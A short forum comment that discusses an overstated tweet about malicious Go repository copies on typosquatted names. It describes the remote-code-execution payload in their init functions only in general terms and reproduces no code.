[raggi]

From what I can see, he wrote the tweet after organically finding one of these via Google and then searching and finding that there were many many more.

It's absolutely true that the wording is wrong, but I think it's reasonable to accept a jumped the gun rather than a clickbait explanation.

The presence of large volumes of project copies on typosquats and synonym squats is still a problem, they'll still get indexed by tools, and then the tools boost their page rank, and eventually some make it to users. Given that the Go init payload contains an RCE and not just a data collection, there is still something of note there. Yes it's not 35k compromised projects, but it is a broad deployment of malicious code.